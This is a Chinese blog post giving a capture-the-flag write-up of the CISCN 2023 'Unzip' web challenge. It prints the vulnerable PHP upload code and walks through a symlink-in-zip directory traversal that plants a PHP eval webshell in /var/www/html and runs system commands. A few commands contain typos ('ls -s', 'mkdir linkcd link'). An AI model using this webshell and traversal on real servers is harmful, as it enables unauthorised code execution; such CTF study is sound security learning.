2023ciscn初赛 Unzip

最新推荐文章于 2024-04-15 22:24:20 发布
最新推荐文章于 2024-04-15 22:24:20 发布
阅读量1k 收藏 1
点赞数 3
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/131234140
版权

 参考:

奇安信攻防社区-2021深育杯线上初赛官方WriteUp-Web篇

1.打开环境

 2.上传一个文件,得到以下源码,分析一下8

 <?php
error_reporting(0);
highlight_file(__FILE__);

$finfo = finfo_open(FILEINFO_MIME_TYPE);  //使用 PHP 内置函数 finfo_open() 创建一个文件信息对象,用于获取指定文件的 MIME 类型
if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip'){
    exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]);
};
///检查文件的MIME类型。如果上传的文件是ZIP文件(MIME类型为application/zip)(MIME类型简单就是文件的媒体类型),则将其解压缩到服务器的/tmp目录,并且覆盖原文件。
};
//only this!

当解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞。此题上传的文件被保存到了/tmp目录下,而且没有require和include这种文件包含的点,因此无法直接执行上传文件里面的代码,因此这里考虑利用软连接,进行目录穿越,将文件上传到任意目录。

参考

一个有趣的任意文件读取 - 先知社区

软连接的作用类似于win下的快捷方式

软连接

软连接是linux中一个常用命令, 它的功能是为某一个文件在另外一个位置建立一个同步的链接。软连接类似与c语言中的指针,传递的是文件的地址; 更形象一些,软连接类似于WINDOWS系统中的快捷方式。 例如,在a文件夹下存在一个文件hello,如果在b文件夹下也需要访问hello文件,那么一个做法就是把hello复制到b文件夹下,另一个做法就是在b文件夹下建立hello的软连接。通过软连接,就不需要复制文件了,相当于文件只有一份,但在两个文件夹下都可以访问。

可以考虑软连接进行目录穿越的几个特征:

有文件上传接口,但是上传文件的目录不能确定可以上传zip文件并且会将文件解压到上传目录下
可以getshell的文件可以绕过waf成功上传此题符合几个特征,因此可以尝试此方法

3.先创建构造一个指向/var/www/html目录的软链接,因为html目录下是web环境,为了后续可以getshell

ls -s /var/www/html/ link

 4.打包到到1.zip,对link文件进行压缩。

zip --symlinks 1.zip link

 zip --symlinks,是在zip压缩文件中,包含符号链接本身,而不是它们指向的实际文件或目录,也就是说当解压缩这个zip文件,将得到符号链接,而不是它们指向的实际文件

5.构造第二个压缩包2.zip。创建一个link目录(因为上一个压缩包里边目录就是link),

在link目录下写一个shell.php文件,文件中写入木马文件,这里先写入phpinfo()进行测试

rm link

mkdir linkcd link  (创建目录)

echo "<?php phpinfo();" > shell.php

cd ../ 

zip -r 2.zip link

6. 将1.zip 和2.zip 依次上传,压缩包会被解压 

当我们上传第二个压缩包时会覆盖上一个link目录,但是link目录软链接指向/var/www/html。

之前我们上传了一个软链接web到/tmp 目录下,此时若解压z.zip的话,正常情况下会解压到:/tmp/web/shell.php 但是由于web指向了 /var/www/html目录,所以会恰好将shell.php解压到 /var/www/html/shell.php 刚好解压到网站的访问目录,达到了getsehll的目的。

传马

ln -s /var/www/html test #ln -s 源文件 目标文件
 
zip -y test1.zip test #-y:直接保存符号连接,而非该链接所指向的文件,本参数仅在UNIX之类的系统下有效;
 
rm -rf test  #rm -rf 删除文件夹
 
mkdir test  #mkdir是make directory的缩写,Linux中 mkdir 命令用来创建指定的名称的目录,要求创建目录的用户在当前目录中具有写权限,并且指定的目录名不能是当前目录中已有的目录。
 
cd test
 
echo '<?php eval($_POST[a]);?>' > a.php
 
cd ..
 
zip -q -r test2.zip test 
#使用zip来将文件夹test压缩为test2.zip
#-r代表 recursive,代表递归处理,将指定目录下的所有文件和子目录一并处理。
#-q代表 quiet,代表无声模式,不输出压缩时的具体细节。

此时可以使用蚁剑连接或者命令执行

a=system('cat /flag')

木…
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
m0_74918915的博客
04-12 1630
其中返回机器的硬件地址(MAC地址),而返回特定于平台的唯一ID。4.: 将所有上述信息串联并进行哈希,得到一个SHA1哈希值。这里,函数将公开信息和私有信息合并为一个序列,然后这个序列中的每一项都被加入到哈希中。添加了一个额外的“salt”值,以确保最终的哈希值是独特的。5.将哈希值转换为16进制的字符串形式,并从中取出前20个字符。然后,它前面添加了"__wzd"前缀来生成最终的。再通过查找关键字,找到set_cookie方法。
[CISCN2023]unzip
leekos的博客,分享web安全相关知识~
05-28 974
目录的话,我们就可以通过该文件直接访问网站的目录了,然后我们将。刚好解压到网站的访问目录,此时我们可以直接使用蚁剑连接了。然后使用zip命令将其压缩为:zip.zip。上传,发现shell.php成功上传到。重点来了,由于之前我们上传了一个软链接。所以会恰好将shell.php解压到。上传成功,然后就可以getshell了。软连接的作用类似于win下的快捷方式。可知,需要使用linux中的。shell.php为一句话木马。首先使用命令创建软链接:web。,上传上去,这样就会在。假如我们使用软链接生成。
CISCN2023 unzip软链接getshell
夜未至
06-19 1970
使用CISCN2023的web题的unzip来演示压缩包的getshell
CTFSHOW国赛复现-----Unzip(软连接利用)
qq_73767109的博客
06-04 2053
因为解压的目录更改了,所以要把解压文件所在目录放在var/www/html(因为html目录下是web环境)这样才能在解压shell文件时实现getshell。这里利用linux构造软连接使得上传文件指向到var/www/html目录下。接下来就是在var/www/html目录下上传一个shell文件就可以了。再上传该压缩包,因为解压后的目录同名所以会覆盖原指定目录。所以此时目录是var/www/html/cmd.php。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。
6.29
网安菜鸡学习笔记
06-29 76
dg-publish: true [CISCN 2023 初赛]go_session [session伪造] 三个路由 r.GET("/", route.Index) r.GET("/admin", route.Admin) r.GET("/flask", route.Flask) 逐个分析 route包里面首先获取了环境变量中的SESSION_KEY func Index(c *gin...
Centos离线安装zip和unzip
02-28
一些情况下, 服务器不联网, 则安装一些常用的命令比较麻烦, 本资源提供 Centos 离线安装 zip 和 unzip 命令和安装方法, 文件包含 unzip-6.0-21.el7.x86_64.rpm 和 zip-3.0-11.el7.x86_64.rpm以及安装命令。
linux系统unzip的rpm安装包
08-31
在Linux操作系统中,`unzip`命令用于解压缩`.zip`格式的文件,而`rpm`则是一个软件包管理器,主要用于安装、升级、查询、验证RPM(Red Hat Package Manager)格式的软件包。本篇文章将深入探讨如何在Linux系统中通过...
ZIP 解压 unzip 静态库
08-07
标题 "ZIP 解压 unzip 静态库" 涉及到的是在计算机编程中处理ZIP文件的方法,特别是关于如何创建和使用ZIP静态库来实现文件的解压缩功能。ZIP是一种广泛使用的文件压缩格式,它允许将多个文件打包成一个单一的可执行...
C++ Unzip源码
12-07
本主题聚焦于“C++ Unzip源码”,这涉及到如何在C++环境中处理ZIP文件,一种常见的压缩文件格式。ZIP文件常用来打包多个文件或目录,便于传输和存储。以下是对这个主题的详细讲解: 首先,`unzip.cpp`和`unzip.h`是...
Windows终端配置zip、unzip命令
07-19
将zip.exe 、unzip.exe放到Git的bin目录下,就可以在Git终端(Git Bash Here)中使用 二、CMD终端 将zip.exe 、unzip.exe的路径追加到环境变量Path中(也可以直接将程序放到C:\Windows目录下) 三、使用方法 解...
web新手题目大全
NYG694的博客
07-18 180
然后再对test进行压缩 zip -r test1.zip test。shell文件内容: <?3指定参数访问(本地127.0.0.1 X-forwarded-for)接下来就是在var/www/html目录下上传一个shell文件就可以了。这时解压文件后是软连接就会实现从tmp指向var/www/html。6.vim读取,利用vim特性读取wep文件。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。4 cookie暗示。
2023ciscn初赛 -- BackendService
qq_44640313的博客
06-03 891
CVE-2022-22947的漏洞和nacos存在鉴权漏洞
2023ciscn初赛 -- Unzip
qq_44640313的博客
06-01 523
解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞,软连接进行目录穿越
[CISCN 2023 初赛]go_session 解题思路&过程
iamblackcat's blog
07-23 1065
[CISCN 2023 初赛]go_session 解题思路&过程
(超详细保姆级教程)CISCN_2023--Web-Unzip(内有做题网站)
qq_74426248的博客
07-26 791
本文章是Ciscn2023初赛--华北地区Web方向Unzip的详细解析,欢迎各位师傅一起讨论交流。
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现(1)
最新发布
04-15 1085
现在我们知道,既然hint提示需要调用JSONObject的put,而该类并没有readObject方法,故而需要找到一个能够调用任意类的put方法的链子作为gadget的一部分,而JSONObject正好也属于Map的实现类,从常用的反序列化类中,符合条件的就是。通过transform间接地实现控制value,并且key也是任意类型,但是在warp方法中,只传进了此方法中的value,再结合hint要利用Myexpect类的方法,猜测要将value赋值为Myexpect对象。
2023全国大学生信息安全竞赛(ciscn)初赛题解
热门推荐
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
ciscn2023-web 总结与思考
m0_64348326的博客
05-29 479
1.一开始本以为是一个简单的dump界面的命令注入,因为猜测源语句可能是先执行命令读取创建日志信息,然后file_get_contents写入/log/目录中。所以一开始就在读取的table_2_dump参数中进行fuzz,发现很多能用来执行命令的符号,例如反引号、$、|、;均被过滤了,不过尝试换行符成功了,于是尝试执行env成功在环境变量中找到了flag。2.赛后才知道这是非预期解,预期是。官方文档中说明了这是一个备份程序,在shell中可以执行备份操作,安装的mysqldump就是链接到该程序中的。
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 970
随便写写
unzip
05-28
unzip是一个用于解压缩zip文件的命令行工具,它可以在Linux、Unix、Windows等操作系统上使用。使用unzip可以将zip文件解压缩到当前目录或指定目录中,并支持解压缩多个zip文件、创建目录、过滤文件等功能。 例如,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值